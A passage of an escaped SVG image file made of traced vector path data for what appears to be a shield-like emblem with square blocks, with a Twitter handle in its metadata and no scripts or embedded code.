version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\r\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 20010904//EN\" \"http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd\">\r\n<svg version=\"1.0\" xmlns=\"http://www.w3.org/2000/svg\" width=\"300.000000pt\" height=\"300.000000pt\" viewBox=\"0 0 300.000000 300.000000\" preserveAspectRatio=\"xMidYMid meet\">\r\n <metadata>\r\n twitter: @insecurity\r\n </metadata>\r\n <g transform=\"translate(0.000000,300.000000) scale(0.100000,-0.100000)\"\r\n fill=\"#000000\" stroke=\"none\">\r\n <path d=\"M128 2910 c-1 -49 -2 -100 -2 -112 -1 -19 4 -23 27 -23 15 0 27 3 27 8 0 4 0 54 0 112 l0 105 -25 0 c-25 0 -25 -1 -27 -90z m29 -27 c-3 -10 -5 -2 -5 17 0 19 2 27 5 18 2 -10 2 -26 0 -35z m0 -45 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M290 2908 c0 -51 -3 -102 -6 -113 -5 -19 0 -20 85 -20 l91 0 0 113 c0 68 -4 112 -10 112 -10 0 -12 -9 -13 -72 0 -21 -4 -38 -9 -38 -4 0 -8 11 -8 24 0 44 -10 56 -38 49 -20 -5 -23 -3 -17 8 8 12 6 12 -8 1 -9 -8 -21 -11 -27 -7 -6 4 -10 3 -9 -2 1 -4 1 -21 0 -37 -2 -45 -12 -24 -14 28 -2 86 -17 46 -17 -46z m110 -21 l0 -62 -30 -1 -30 -2 0 64 0 64 30 0 30 0 0 -63z m30 -62 c-8 -9 -8 -15 0 -18 7 -4 7 -5 0 -3 -7 1 -11 5 -11 9 1 4 1 22 2 40 0 30 1 31 10 8 6 -16 6 -28 -1 -36z m-90 -16 c0 -5 -7 -9 -15 -9 -15 0 -20 12 -9 23 8 8 24 -1 24 -14z\"/>\r\n <path d=\"M600 2888 l0 -113 90 0 90 0 0 113 c0 93 -3 112 -15 112 -9 0 -15 -10 -15 -26 0 -20 -4 -25 -16 -20 -9 3 -18 6 -20 6 -3 0 -3 3 0 8 2 4 -13 6 -35 4 -36 -4 -39 -7 -39 -33 0 -16 -4 -29 -9 -29 -5 0 -6 20 -3 45 4 37 2 45 -12 45 -14 0 -16 -15 -16 -112z m118 -2 c-3 -58 -4 -61 -29 -61 -15 -1 -34 -7 -43 -14 -14 -12 -16 -10 -15 15 0 25 2 26 9 9 7 -18 9 -18 15 -3 4 10 5 41 3 70 l-3 53 33 -3 33 -4 -3 -62z m32 -44 c0 -19 -5 -29 -15 -29 -11 0 -12 4 -5 11 5 5 10 18 10 28 0 10 2 18 5 18 3 0 5 -13 5 -28z\"/>\r\n <path d=\"M919 2900 c-1 -55 -2 -105 -3 -111 -1 -8 28 -12 87 -13 l87 -1 0 113 c0 92 -3 112 -15 112 -9 0 -12 -6 -8 -17 4 -11 3 -14 -5 -9 -8 5 -8 -1 0 -24 5 -17 8 -34 4 -37 -3 -4 -6 0 -6 9 0 22 -33 48 -62 48 -38 0 -52 -36 -44 -109 5 -42 4 -61 -4 -61 -7 0 -11 28 -10 83 2 112 1 117 -10 117 -6 0 -11 -41 -11 -100z m111 -14 l0 -65 -29 1 c-30 1 -30 1 -30 65 l0 63 30 0 29 0 0 -64z m34 -69 c-3 -9 -11 -14 -16 -11 -6 4 -5 10 3 15 11 7 11 9 1 9 -7 0 -10 5 -6 11 10 16 26 -5 18 -24z\"/>\r\n <path d=\"M1211 2894 l3 -107 -50 -24 c-146 -72 -347 -121 -530 -130 l-122 -6 -6 -45 c-18 -134 -2 -496 30 -687 19 -108 84 -310 119 -365 30 -48 31 -57 5 -65 -11 -3 -20 -13 -20 -21 0 -8 -4 -13 -9 -10 -14 9 -7 34 15 51 16 12 17 14 2 15 -9 0 -23 3 -32 6 -14 5 -16 -8 -16 -110 l0 -116 91 0 c90 0 91 0 85 23 -3 12 -6 25 -6 30 0 15 -20 7 -20 -9 0 -8 -4 -13 -9 -9 -5 3 -12 1 -16 -5 -3 -5 -12 -10 -18 -10 -7 0 -4 5 6 11 11 7 17 22 17 49 0 22 3 40 8 40 4 0 18 -17 32 -37 32 -46 101 -117 165 -168 27 -22 59 -48 69 -57 11 -10 28 -20 38 -24 18 -5 19 -15 16 -115 l-3 -109 33 0 32 0 0 54 c0 69 -10 117 -22 110 -10 -6 -28 12 -28 28 0 9 39 -8 107 -47 l53 -30 0 -57 0 -58 91 0 c68 0 90 3 86 13 -2 6 -13 11 -24 9 -11 -1 -26 4 -33 13 -7 8 -25 15 -41 15 -21 0 -29 5 -30 18 0 9 -3 12 -5 5 -3 -7 0 -21 6 -32 8 -17 8 -19 -4 -15 -19 7 -24 22 -21 67 2 32 -2 38 -27 49 -15 7 -28 16 -28 19 0 3 -18 12 -40 19 -22 7 -45 19 -51 27 -6 7 -18 13 -25 13 -8 0 -13 5 -12 12 2 7 -2 12 -9 13 -14 0 -43 24 -61 51 -7 10 -10 13 -7 7 8 -17 -1 -16 -31 4 -19 12 -22 18 -12 25 10 7 9 8 -3 6 -9 -2 -37 16 -62 40 -26 23 -44 42 -42 42 3 0 -3 9 -12 20 -10 11 -23 20 -31 20 -7 0 -10 5 -6 12 4 7 3 8 -4 4 -7 -4 -12 -1 -12 8 0 9 -4 16 -8 16 -4 0 -16 14 -26 30 -9 17 -27 40 -39 52 -21 20 -21 21 -2 14 17 -5 18 -4 4 6 -19 15 -79 139 -79 162 0 9 -4 24 -9 34 -18 35 -30 68 -40 107 -14 53 -14 68 2 59 6 -4 4 1 -5 12 -9 11 -17 28 -17 39 0 11 -5 54 -11 95 -20 135 -23 183 -23 383 0 183 1 198 19 211 12 9 24 11 35 5 9 -4 18 -6 21 -4 3 3 34 7 69 9 82 6 187 24 212 37 10 6 28 9 38 6 13 -3 17 -1 12 6 -4 8 -1 7 9 -1 13 -10 17 -10 22 3 3 8 17 15 31 15 14 0 25 4 25 8 0 5 6 9 13 9 28 1 97 24 97 33 0 6 3 9 8 9 4 -1 10 0 15 1 10 3 25 7 35 9 4 0 19 12 34 26 15 14 42 28 60 32 18 3 44 17 58 30 13 13 29 23 34 23 5 0 16 7 25 15 9 8 29 27 46 42 16 16 35 27 43 25 9 -2 11 1 7 8 -11 18 34 2 58 -21 12 -10 29 -21 39 -25 10 -3 18 -11 18 -19 0 -7 9 -15 21 -18 13 -4 18 -10 13 -18 -4 -8 -3 -10 4 -5 7 4 12 3 12 -3 0 -6 6 -8 13 -6 17 7 80 -33 72 -45 -6 -10 7 -14 31 -11 6 1 17 -6 24 -14 7 -8 18 -15 26 -15 23 0 64 -23 58 -32 -3 -5 0 -8 7 -7 21 3 79 -13 79 -21 0 -5 10 -6 22 -2 15 4 19 2 13 -7 -5 -10 -2 -11 14 -6 12 4 21 2 21 -4 0 -6 7 -8 15 -5 8 4 22 1 30 -6 9 -7 18 -10 21 -7 3 3 20 1 37 -4 27 -8 129 -16 267 -22 33 -2 35 -4 39 -42 10 -88 4 -486 -8 -585 -7 -58 -13 -115 -13 -127 0 -13 -3 -21 -8 -18 -4 2 -5 -7 -2 -20 2 -15 0 -25 -7 -25 -7 0 -10 -4 -6 -10 6 -9 -39 -178 -51 -189 -4 -3 -3 5 0 19 6 21 5 22 -4 7 -6 -9 -8 -22 -5 -27 6 -11 -41 -117 -62 -138 -7 -7 -13 -18 -13 -23 0 -6 -4 -7 -10 -4 -6 4 -10 -5 -10 -20 0 -17 -7 -29 -22 -35 -13 -5 -19 -9 -14 -9 9 -1 -88 -101 -98 -101 -3 0 -28 -22 -55 -50 -27 -27 -56 -50 -64 -50 -8 0 -22 -11 -31 -25 -9 -14 -24 -25 -34 -25 -14 0 -14 -2 -3 -9 10 -6 27 -1 55 17 52 33 161 127 201 171 16 19 40 46 53 59 l22 25 -1 -39 c0 -21 -3 -34 -5 -27 -8 18 -34 4 -34 -18 0 -17 8 -19 88 -19 l87 0 -3 113 c-3 114 -3 114 -27 109 -15 -2 -22 -9 -18 -18 3 -8 9 -11 14 -8 5 3 9 -5 9 -17 0 -21 -1 -21 -20 -4 -19 17 -19 16 -17 -54 l2 -71 -31 0 c-31 0 -32 0 -29 46 2 28 11 55 23 68 62 69 142 314 168 516 18 136 25 536 11 630 l-8 55 -109 2 c-186 4 -350 41 -528 121 l-83 37 3 94 c2 71 0 95 -10 99 -9 3 -13 -3 -12 -14 1 -11 1 -37 0 -59 l-3 -40 -6 35 c-4 20 -2 39 4 43 6 5 2 6 -9 3 -10 -4 -24 -2 -30 3 -6 5 -21 5 -33 0 -26 -10 -48 -45 -33 -54 5 -3 10 -10 10 -16 0 -5 -9 -4 -20 3 -12 8 -18 19 -14 28 3 8 7 23 9 33 2 9 7 22 10 27 3 6 -4 10 -16 10 -19 0 -21 -4 -16 -35 3 -19 3 -35 -1 -35 -3 0 -21 14 -39 32 l-33 32 -25 -24 c-54 -55 -65 -60 -65 -30 0 18 10 25 33 21 4 0 7 8 7 19 0 15 -7 20 -25 20 -23 0 -25 -3 -25 -48 0 -47 -2 -50 -47 -79 -74 -48 -125 -74 -130 -69 -11 11 7 35 22 30 13 -5 15 7 15 80 0 96 -17 118 -23 29 l-3 -58 -2 58 c-2 44 -5 57 -18 57 -13 0 -15 -15 -13 -106z m489 6 c0 -27 5 -50 10 -50 6 0 10 8 10 17 0 22 6 14 14 -20 6 -26 5 -27 -14 -17 -11 6 -20 9 -20 6 0 -3 -13 7 -29 22 -16 16 -31 41 -33 60 -4 31 -3 32 29 32 33 0 33 0 33 -50z m-990 -1459 c5 -11 10 -40 10 -65 0 -43 -2 -46 -27 -46 -14 0 -35 -7 -45 -17 -17 -15 -18 -15 -18 0 0 10 6 16 13 15 8 -2 13 17 15 65 3 58 5 67 22 67 11 0 24 -9 30 -19z m-78 -83 c-7 -7 -12 -8 -12 -2 0 14 12 26 19 19 2 -3 -1 -11 -7 -17z m1737 -49 c-16 -10 -23 -4 -14 10 3 6 11 8 17 5 6 -4 5 -9 -3 -15z m-1276 -289 c-3 -12 -8 -19 -11 -16 -5 6 5 36 12 36 2 0 2 -9 -1 -20z m-6 -52 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M1872 2889 l3 -112 28 -3 27 -3 0 115 c0 97 -2 114 -16 114 -13 0 -15 -14 -12 -95 2 -52 0 -95 -4 -95 -5 0 -8 43 -8 95 0 59 -4 95 -10 95 -7 0 -10 -40 -8 -111z\"/>\r\n <path d=\"M2040 2888 l0 -113 30 0 30 0 0 113 c0 117 -16 156 -23 55 l-3 -58 -2 58 c-2 43 -6 57 -17 57 -12 0 -15 -19 -15 -112z m43 -28 c3 -11 1 -23 -4 -26 -5 -3 -9 6 -9 20 0 31 6 34 13 6z\"/>\r\n <path d=\"M2220 2888 l0 -113 85 2 c47 1 85 5 85 8 0 3 0 52 0 110 0 63 -4 105 -10 105 -5 0 -11 -17 -11 -37 l-2 -38 -7 40 c-5 30 -8 33 -9 13 0 -15 -6 -30 -12 -33 -6 -4 -9 -31 -8 -62 3 -55 2 -56 -27 -59 l-29 -3 2 62 c1 62 1 62 32 65 38 4 31 22 -8 22 -45 0 -55 -21 -48 -98 5 -51 4 -63 -5 -48 -7 12 -9 48 -5 98 5 65 4 78 -8 78 -12 0 -15 -20 -15 -112z m147 -70 c-2 -13 -4 -3 -4 22 0 25 2 35 4 23 2 -13 2 -33 0 -45z\"/>\r\n <path d=\"M2510 2895 c0 -58 0 -108 0 -112 0 -4 12 -7 28 -7 27 0 27 0 25 65 -1 35 -2 85 -2 112 -1 46 -15 64 -24 30 -4 -17 -5 -17 -6 0 0 9 -5 17 -11 17 -6 0 -10 -42 -10 -105z m27 -67 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z\"/>\r\n <path d=\"M2690 2901 c0 -55 -2 -105 -5 -113 -4 -10 14 -13 85 -13 l90 0 0 113 c0 68 -4 112 -10 112 -9 0 -11 -9 -15 -62 -1 -26 -15 -34 -15 -10 0 29 -45 59 -64 43 -16 -14 -46 -4 -46 15 0 8 -4 14 -10 14 -6 0 -10 -40 -10 -99z m112 -16 c-4 -64 -4 -65 -30 -62 -26 3 -27 7 -30 65 l-2 62 32 0 33 0 -3 -65z m-85 3 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m119 -57 c-4 -6 -13 -11 -19 -10 -9 0 -9 2 0 5 7 3 9 13 6 22 -5 13 -3 14 7 5 7 -6 9 -16 6 -22z m-112 4 c3 -8 1 -15 -4 -15 -6 0 -10 7 -10 15 0 8 2 15 4 15 2 0 6 -7 10 -15z m99 -32 c-7 -2 -19 -2 -25 0 -7 3 -2 5 12 5 14 0 19 -2 13 -5z\"/>\r\n <path d=\"M1490 2762 c-8 -3 -19 -11 -23 -19 -5 -7 -14 -10 -20 -7 -7 4 -9 4 -5 -1 11 -12 -40 -48 -58 -41 -10 4 -14 1 -11 -6 5 -16 -89 -70 -121 -70 -12 0 -25 -5 -29 -11 -4 -6 -1 -7 7 -2 8 5 11 4 6 -3 -3 -6 -20 -13 -36 -17 -16 -4 -32 -11 -35 -16 -4 -5 -22 -9 -41 -9 -19 0 -33 -4 -30 -9 4 -5 -13 -12 -36 -16 -24 -4 -69 -13 -100 -21 -32 -8 -96 -16 -143 -17 -116 -4 -114 -1 -115 -202 0 -161 15 -346 30 -376 5 -9 6 -27 3 -39 -3 -13 -2 -21 3 -18 5 4 10 -11 12 -33 1 -21 11 -58 21 -81 10 -24 16 -49 14 -55 -3 -7 1 -13 7 -13 7 0 9 -9 5 -22 -5 -18 -4 -20 4 -8 9 13 11 13 11 0 0 -20 33 -84 53 -105 9 -8 14 -22 10 -30 -4 -11 0 -14 13 -9 11 4 16 4 13 0 -6 -6 44 -69 88 -110 52 -49 88 -81 93 -81 17 -1 52 -36 47 -48 -4 -10 1 -13 19 -9 14 2 32 -2 42 -11 9 -8 27 -18 40 -22 12 -3 20 -11 16 -16 -3 -5 -2 -8 3 -7 14 4 94 -32 89 -40 -3 -5 8 -7 25 -6 21 1 29 -2 29 -14 0 -14 2 -14 9 -3 7 11 12 10 28 -6 11 -11 31 -18 48 -17 17 1 35 -3 42 -8 8 -7 18 -5 28 6 9 9 22 16 28 16 7 0 29 9 50 20 43 23 51 25 41 8 -4 -7 2 -4 13 8 11 11 41 28 67 38 27 10 43 22 40 28 -4 6 -2 8 3 5 12 -7 139 74 160 101 7 9 13 14 13 10 0 -11 81 75 125 132 22 29 48 61 57 71 9 9 14 20 11 23 -3 2 5 15 16 27 12 13 19 29 17 35 -2 6 2 21 9 31 8 11 22 48 31 81 9 34 21 59 26 56 4 -3 8 -1 8 5 0 5 -4 12 -8 15 -4 3 -6 21 -4 42 3 21 8 31 12 24 18 -30 28 199 20 493 -2 82 -5 100 -21 111 -10 7 -17 15 -14 18 7 7 -27 7 -45 0 -25 -9 -50 -10 -50 0 0 5 -21 8 -47 7 -27 -1 -61 1 -78 4 -92 14 -114 20 -108 30 3 5 1 7 -5 3 -6 -3 -23 -1 -39 6 -15 6 -31 12 -35 13 -5 2 -10 4 -13 5 -7 3 -22 7 -36 9 -5 0 -8 5 -5 10 3 5 -1 12 -10 15 -8 3 -12 2 -9 -4 10 -16 -11 -12 -25 4 -6 8 -19 12 -27 9 -11 -4 -14 -2 -9 5 6 11 2 13 -19 12 -3 -1 -12 5 -20 12 -32 29 -45 39 -45 33 0 -3 -14 7 -31 22 -45 41 -82 61 -99 55z m141 -115 c50 -32 134 -74 211 -105 73 -30 209 -54 304 -56 l102 -1 6 -73 c24 -262 -17 -595 -94 -767 -58 -129 -174 -257 -315 -350 -98 -64 -122 -76 -242 -125 l-95 -38 -68 23 c-117 40 -244 107 -345 184 -217 165 -325 375 -354 691 -19 214 -21 245 -14 341 l6 96 106 6 c151 9 294 48 433 118 77 39 188 111 213 139 l19 21 35 -34 c20 -19 61 -50 92 -70z\"/>\r\n <path d=\"M1330 2441 c-104 -26 -140 -41 -140 -57 0 -19 20 -18 89 6 91 30 227 44 316 30 77 -12 98 -9 89 14 -6 16 -3 15 -154 21 -100 3 -140 1 -200 -14z\"/>\r\n <path d=\"M1737 2413 c-9 -14 5 -27 44 -41 46 -16 59 -15 59 3 0 22 -92 55 -103 38z\"/>\r\n <path d=\"M1377 2373 c-20 -3 -27 -9 -25 -21 2 -11 11 -16 23 -13 11 2 70 3 130 4 154 1 256 -32 368 -117 48 -37 77 -46 77 -24 0 37 -159 128 -276 158 -73 19 -216 25 -297 13z\"/>\r\n <path d=\"M1200 2310 c-74 -39 -180 -122 -180 -141 0 -25 33 -19 63 11 40 41 137 105 183 120 23 8 34 17 32 28 -5 26 -20 23 -98 -18z\"/>\r\n <path d=\"M1438 2298 c-37 -3 -85 -12 -105 -19 -180 -58 -321 -211 -340 -368 -5 -47 -4 -51 14 -51 17 0 22 9 28 47 11 73 57 163 111 216 97 97 200 138 349 142 77 2 100 6 100 16 0 18 -70 26 -157 17z\"/>\r\n <path d=\"M1647 2273 c-14 -13 -6 -22 31 -33 20 -7 57 -23 81 -37 39 -23 45 -24 59 -9 14 14 9 18 -59 51 -72 35 -99 41 -112 28z\"/>\r\n <path d=\"M990 2235 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0 -10 -7 -10 -15z\"/>\r\n <path d=\"M1467 2224 c-21 -21 -3 -32 66 -36 126 -9 221 -58 292 -150 44 -58 65 -124 65 -208 0 -65 2 -70 21 -70 21 0 21 4 17 93 -3 81 -8 99 -38 155 -50 94 -142 167 -250 200 -47 14 -164 25 -173 16z\"/>\r\n <path d=\"M1322 2188 c-41 -17 -72 -36 -72 -44 0 -20 14 -18 89 12 78 31 86 37 69 52 -10 8 -32 3 -86 -20z\"/>\r\n <path d=\"M1853 2154 c-3 -10 7 -29 29 -52 19 -20 44 -56 54 -79 20 -45 33 -56 53 -43 16 10 -12 66 -69 138 -43 55 -57 62 -67 36z\"/>\r\n <path d=\"M772 2135 c0 -16 2 -22 5 -12 2 9 2 23 0 30 -3 6 -5 -1 -5 -18z\"/>\r\n <path d=\"M1410 2136 c-69 -19 -111 -44 -159 -94 -52 -54 -80 -113 -81 -164 0 -31 4 -38 20 -38 14 0 20 7 20 23 0 109 106 219 233 242 27 5 37 12 35 23 -4 21 -15 22 -68 8z\"/>\r\n <path d=\"M1543 2143 c-27 -9 -12 -32 25 -38 20 -4 47 -10 60 -16 17 -7 24 -5 29 6 3 9 3 18 0 21 -9 9 -102 31 -114 27z\"/>\r\n <path d=\"M1173 2088 c-58 -61 -86 -132 -93 -234 -4 -81 -8 -94 -29 -111 -14 -11 -21 -25 -17 -31 11 -19 31 -14 57 14 21 22 25 39 30 118 6 102 29 162 82 216 17 18 27 36 23 45 -8 22 -19 19 -53 -17z\"/>\r\n <path d=\"M1695 2070 c-3 -5 11 -26 31 -46 63 -64 76 -108 73 -242 -3 -101 -1 -117 12 -120 25 -5 29 18 26 151 -2 135 -10 158 -76 230 -35 37 -55 45 -66 27z\"/>\r\n <path d=\"M1445 2063 c-38 -8 -90 -36 -118 -62 -49 -45 -67 -92 -67 -176 0 -90 -22 -141 -81 -194 -39 -33 -52 -71 -25 -71 23 0 124 117 135 158 6 20 11 66 11 101 0 112 41 170 144 205 61 21 131 9 189 -31 59 -41 77 -86 77 -191 0 -156 -47 -280 -151 -395 -49 -54 -57 -68 -44 -73 19 -8 70 37 124 111 78 106 111 209 111 349 0 116 -16 162 -72 212 -56 50 -155 75 -233 57z\"/>\r\n <path d=\"M1424 1970 c-55 -28 -72 -65 -77 -170 -4 -102 -23 -143 -96 -215 -49 -48 -66 -85 -37 -85 19 0 122 113 147 162 15 30 23 70 28 141 6 95 8 100 36 123 23 18 42 24 83 24 46 0 58 -4 83 -29 28 -28 29 -33 29 -119 0 -158 -53 -275 -179 -396 -34 -31 -61 -62 -61 -67 0 -28 45 0 112 69 134 138 162 205 163 384 0 110 -1 118 -25 143 -52 57 -134 70 -206 35z\"/>\r\n <path d=\"M1459 1897 c-13 -10 -18 -34 -20 -102 -5 -119 -33 -176 -133 -275 -41 -40 -73 -77 -70 -82 13 -20 40 -3 110 67 96 96 124 156 133 280 5 81 8 90 26 90 18 0 20 -8 23 -64 6 -136 -30 -222 -145 -340 -45 -47 -80 -89 -77 -93 11 -18 33 -4 107 70 111 110 148 187 155 323 4 86 2 102 -13 119 -21 23 -71 26 -96 7z\"/>\r\n <path d=\"M1170 1771 c0 -22 -12 -41 -45 -73 -44 -42 -58 -78 -31 -78 18 0 94 83 106 116 16 41 12 64 -10 64 -15 0 -20 -7 -20 -29z\"/>\r\n <path d=\"M1774 1603 c-3 -10 -12 -33 -20 -52 -16 -35 -8 -56 17 -46 16 6 51 94 43 107 -9 14 -34 8 -40 -9z\"/>\r\n <path d=\"M1595 1330 c-3 -5 -1 -10 4 -10 6 0 11 5 11 10 0 6 -2 10 -4 10 -3 0 -8 -4 -11 -10z\"/>\r\n <path d=\"M124 2497 l1 -112 87 -2 88 -2 0 115 0 114 -88 0 -88 0 0 -113z m149 68 c-7 -21 -13 -19 -13 6 0 11 4 18 10 14 5 -3 7 -12 3 -20z m-101 3 c-5 -7\r\n -12 -22 -15 -33 -3 -13 -5 -9 -6 13 -1 23 3 32 15 32 12 0 14 -3 6 -12z m70 -59 c-3 -42 0 -75 6 -81 14 -14 26 30 20 72 -2 16 -1 27 4 24 9 -6 11 -75 2 -98 -3 -9 -15 -16 -26 -16 -10 0 -16 5 -13 10 4 6 -7 10 -24 10 l-31 0 0 65 0 65 30 0 c17 0 30 5 30 10 0 6 1 10 3 10 1 0 1 -32 -1 -71z m-58 -92 c7 -5 3 -7 -9 -5 -13 2 -21 12 -23 28 -2 24 -2 24 9 5 7 -11 17 -24 23 -28z\"/>\r\n <path d=\"M420 2497 l0 -114 30 -1 30 -1 0 115 0 114 -30 0 -30 0 0 -113z m31 -24 c2 -23 0 -45 -4 -49 -4 -4 -7 17 -7 46 0 62 7 64 11 3z\"/>\r\n <path d=\"M2527 2498 l2 -112 86 -3 85 -3 0 115 0 115 -87 0 -88 0 2 -112z m73 88 c0 -3 -4 -8 -10 -11 -5 -3 -10 -1 -10 4 0 6 5 11 10 11 6 0 10 -2 10 -4z m-30 -15 c0 -6 -4 -12 -8 -15 -5 -3 -9 1 -9 9 0 8 4 15 9 15 4 0 8 -4 8 -9z m108 -18 c2 -12 -1 -30 -7 -40 -8 -14 -9 -8 -4 21 4 27 3 37 -5 32 -6 -3 -14 -1 -17 5 -5 7 0 10 11 7 11 -2 20 -13 22 -25z m-38 -58 l0 -65 -30 0 -30 0 1 65 c2 65 2 65 30 65 29 0 29 0 29 -65z m35 -66 c-4 -11 -15 -19 -26 -19 -11 0 -17 5 -14 10 3 6 13 10 20 10 11 0 13 9 9 33 -4 29 -4 30 6 8 6 -13 8 -32 5 -42z m-106 -7 c1 -7 -3 -10 -9 -7 -5 3 -10 18 -9 33 0 24 1 25 9 7 5 -11 9 -26 9 -33z\"/>\r\n <path d=\"M2800 2495 l0 -115 30 0 30 0 0 115 0 115 -30 0 -30 0 0 -115z m40 -31 c0 -34 -4 -53 -10 -49 -5 3 -10 28 -10 56 0 27 5 49 10 49 6 0 10 -25 10 -56z\"/>\r\n <path d=\"M123 2140 l-1 -110 29 0 29 0 0 94 c0 52 3 101 6 110 5 13 -1 16 -27 16 l-34 0 -2 -110z\"/>\r\n <path d=\"M285 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m147 68 c-2 -10 -6 -18 -8 -18 -2 0 -8 8 -13 18 -7 14 -6 18 8 18 12 0 17 -6 13 -18z m-32 -71 l0 -64 -30 5 c-29 4 -30 5 -30 63 0 59 0 59 30 59 l30 0 0 -63z m37 -27 c4 -48 3 -59 -8 -55 -10 4 -13 21 -11 66 5 74 13 70 19 -11z m-114 -4 c2 -16 12 -35 23 -43 18 -14 18 -14 -6 -11 -27 3 -39 28 -32 66 6 28 10 25 15 -12z\"/>\r\n <path d=\"M2510 2140 l0 -110 28 0 27 0 0 110 0 110 -27 0 -28 0 0 -110z m27 -42 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z\"/>\r\n <path d=\"M2685 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m135 73 c0 -14 -2 -15 -9 -4 -6 10 -20 12 -45 8 -20 -3 -36 -2 -36 2 0 4 20 8 45 10 38 2 45 -1 45 -16z m-20 -73 c0 -60 0 -60 -30 -60 -30 0 -30 0 -30 60 0 60 0 60 30 60 30 0 30 0 30 -60z m40 44 c0 -8 -5 -12 -10 -9 -6 4 -8 11 -5 16 9 14 15 11 15 -7z m-104 -119 c13 -9 12 -11 -5 -11 -19 0 -21 6 -19 56 1 53 2 53 5 11 3 -25 11 -50 19 -56z m91 73 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m13 -43 c0 -25 -32 -50 -53 -41 -7 2 -4 5 6 5 11 1 20 12 24 31 7 36 23 40 23 5z\"/>\r\n <path d=\"M124 1750 l1 -110 88 0 87 0 0 110 0 110 -88 0 -89 0 1 -110z m37 53 c-9 -16 -10 -14 -11 12 0 21 3 26 11 18 8 -8 8 -16 0 -30z m93 21 c5 -14 4 -15 -9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-14 -77 c0 -62 0 -63 -27 -61 -27 1 -28 3 -31 62 l-3 62 31 0 30 0 0 -63z m37 11 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m-13 -85 c-17 -17 -18 -17 -11 0 4 10 7 24 7 30 0 8 3 8 11 0 9 -9 7 -16 -7 -30z m-94 2 c10 -12 10 -15 -4 -15 -9 0 -16 7 -16 15 0 8 2 15 4 15 2 0 9 -7 16 -15z\"/>\r\n <path d=\"M420 1750 l0 -110 30 0 30 0 0 110 0 110 -30 0 -30 0 0 -110z\"/>\r\n <path d=\"M2525 1750 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m45 66 c0 -23 -16 -27 -17 -5 -1 10 2 19 8 19 5 0 9 -6 9 -14z m101 -3 c5 -97 5 -134 -2 -145 -5 -8 -9 17 -9 59 0 39 -3 78 -6 87 -3 9 -1 16 5 16 6 0 11 -8 12 -17z m-29 -72 c2 -52 0 -67 -9 -60 -6 6 -20 9 -30 7 -16 -3 -18 5 -21 60 l-3 62 30 0 29 0 4 -69z m-85 -23 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m20 -44 c2 -6 -3 -11 -12 -11 -8 0 -15 7 -15 15 0 15 22 12 27 -4z\"/>\r\n <path d=\"M2800 1751 c0 -108 0 -109 25 -113 13 -3 27 -3 30 0 3 3 5 54 5 114 l0 108 -30 0 -30 0 0 -109z m40 -11 c0 -33 -4 -60 -9 -60 -9 0 -14 98 -5 112 11 17 14 6 14 -52z\"/>\r\n <path d=\"M641 1634 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z\"/>\r\n <path d=\"M129 1507 c0 -1 -1 -53 -2 -115 l-2 -112 28 0 27 0 0 105 c0 58 1 108 3 111 1 4 -10 8 -25 10 -16 1 -28 2 -29 1z m28 -99 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z\"/>\r\n <path d=\"M290 1505 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111 -83 1 c-45 1 -82 2 -82 2z m142 -47 c5 -76 3 -144 -7 -150 -16 -12 -35 -9 -32 5 1 7 -10 13 -26 15 -28 3 -28 4 -25 65 3 59 4 62 31 64 l27 2 0 -70 c0 -44 4 -69 11 -69 8 0 10 26 7 80 -2 44 0 80 4 80 5 0 9 -10 10 -22z m-109 -3 c-3 -9 -8 -14 -10 -11 -3 3 -2 9 2 15 9 16 15 13 8 -4z m10 -144 c10 -11 9 -13 -3 -9 -17 5 -28 59 -20 103 4 22 6 16 8 -25 2 -30 9 -61 15 -69z\"/>\r\n <path d=\"M2510 1505 c0 0 -1 -51 -3 -113 l-2 -112 30 0 31 0 -2 112 -3 111 -25 2 c-14 0 -26 1 -26 0z m32 -102 c-5 -83 -9 -90 -11 -20 0 37 2 67 7 67 4 0 6 -21 4 -47z\"/>\r\n <path d=\"M2689 1500 c0 -3 -1 -53 -2 -112 l-2 -108 88 0 88 0 -3 111 -3 111\r\n -83 1 c-45 1 -82 0 -83 -3z m42 -43 c-6 -6 -11 -35 -11 -64 0 -29 -3 -53 -7\r\n -53 -8 0 -6 104 2 128 3 7 10 10 16 7 8 -5 8 -10 0 -18z m93 7 c5 -14 4 -15\r\n -9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-21 -16 c-2 -5 -3 -33 -3 -63 0\r\n -54 0 -55 -30 -55 -30 0 -30 0 -30 58 0 32 2 61 5 63 7 8 60 5 58 -3z m37 -74\r\n c0 -41 -4 -63 -10 -59 -5 3 -10 1 -10 -4 0 -6 -7 -11 -17 -11 -15 0 -15 1 0\r\n 18 11 12 17 36 17 70 0 29 5 52 10 52 6 0 10 -29 10 -66z m-103 -70 c-9 -9\r\n -28 6 -21 18 4 6 10 6 17 -1 6 -6 8 -13 4 -17z\"/>\r\n <path d=\"M2080 1459 c0 -5 5 -7 10 -4 6 3 10 8 10 11 0 2 -4 4 -10 4 -5 0 -10\r\n -5 -10 -11z\"/>\r\n <path d=\"M129 1110 c-1 -3 -2 -53 -3 -112 l-1 -108 87 0 88 0 0 113 0 112 -85\r\n 0 c-47 0 -86 -2 -86 -5z m42 